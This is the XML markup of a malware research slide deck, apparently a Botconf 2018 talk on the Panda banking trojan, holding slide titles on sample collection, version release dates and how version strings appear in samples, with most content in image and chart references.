            <a:alphaModFix amt="25000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="55051" b="37699"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921164" y="6431396"/>
            <a:ext cx="7391400" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="656520029"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483657" r:id="rId1"/>
    <p:sldLayoutId id="2147483665" r:id="rId2"/>
    <p:sldLayoutId id="2147483658" r:id="rId3"/>
    <p:sldLayoutId id="2147483651" r:id="rId4"/>
    <p:sldLayoutId id="2147483660" r:id="rId5"/>
    <p:sldLayoutId id="2147483661" r:id="rId6"/>
    <p:sldLayoutId id="2147483662" r:id="rId7"/>
    <p:sldLayoutId id="2147483664" r:id="rId8"/>
    <p:sldLayoutId id="2147483663" r:id="rId9"/>
    <p:sldLayoutId id="2147483656" r:id="rId10"/>
    <p:sldLayoutId id="2147483659" r:id="rId11"/>
    <p:sldLayoutId id="2147483666" r:id="rId12"/>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sz="3600" b="1" kern="1200">
          <a:solidFill>
            <a:srgbClr val="3D5A6A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="20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chemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1200150" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Lucida Grande"/>
        <a:buChar char="-"/>
        <a:defRPr sz="16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3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chart" Target="../charts/chart14.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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chart" Target="../charts/char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chart" Target="../charts/char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chart" Target="../charts/chart26.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide68.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chart" Target="../charts/chart30.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Everything </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Panda </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>banker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4572000"/>
            <a:ext cx="9092184" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4C51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dennis Schwarz (@tildedennis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Botconf, December 2018</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4C51"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403636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6324600" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All The Samples!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEF571F1-6FF7-A744-8A45-BE6C9C57D34F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="280668" y="1295400"/>
            <a:ext cx="11630660" cy="1032308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5F7D5E5-46F6-204F-91C1-1E9A491BFAF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="466361" y="2727364"/>
            <a:ext cx="11382007" cy="1129770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F3167FB-8623-3843-9956-BDCC978B6703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="527727" y="4464207"/>
            <a:ext cx="11259273" cy="986462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E025FD-FAF4-ED49-81CD-20712BA227D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5029200"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D589955F-C861-A44F-9977-1F01BBF0C3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="5181600"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24E9A495-38CD-084D-828A-E5ACB508F822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5334000"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6236E99B-8A14-2D4B-866D-50EEA0B1E1CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401504" y="2620317"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0DF704B-07E2-604D-B50D-AD0C67746B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="0"/>
            <a:ext cx="1435100" cy="1016051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303361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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.1.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>January 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 minor releases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.2.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>April 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>14 minor releases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.3.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>March 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 minor releases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.4.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>June 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 minor releases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.5.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>August 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8 minor releases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.6.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>December 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>11 minor releases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Release Dates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4201728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dirty="0"/>
              <a:t>2.6.2 (January)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.6.3 (February)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.6.4 (February)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.6.5 (March)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.6.6 (March)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.6.7 (April)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.6.8 (April)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.6.9 (May)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.6.10 (June)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355032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Version Activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Chart 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB849484-F1CF-1B4C-9A8A-D3793F161D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2062631926"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1062681"/>
          <a:ext cx="11049000" cy="53467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CF0365D3-EC98-5046-947F-7F39341B3493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5974813" y="3244334"/>
            <a:ext cx="242374"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341051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Take Warning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDA Pro Screenshots Ahead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="871841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Version (2.1.0 - 2.5.7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="5334000" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“%u.%u.%u” wide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="65532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419F3EBA-5579-214E-B1F1-857C38A8EC68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2337722"/>
            <a:ext cx="9914835" cy="2552700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="469484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Version (2.6.0 - present)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="5334000" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“%u.%u” ascii</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="65532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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9643DA4-30EE-C443-A410-2FD7E4927439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2124641"/>
            <a:ext cx="7175500" cy="3831446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1803071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Version (most Zeus variants)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EA4E52A-2A46-A74C-959B-4DE74427F73B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="81358" y="1676400"/>
            <a:ext cx="12029283" cy="1718469"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6553200" y="1676400"/>
          <a:ext cx="4224782" cy="38753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31795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API Function Calls (2.1.0 - 2.5.7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0007E4E7-F4B1-FE47-9237-46593B60AA0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="9694277" cy="4332544"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3969561932"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6088419" y="1676400"/>
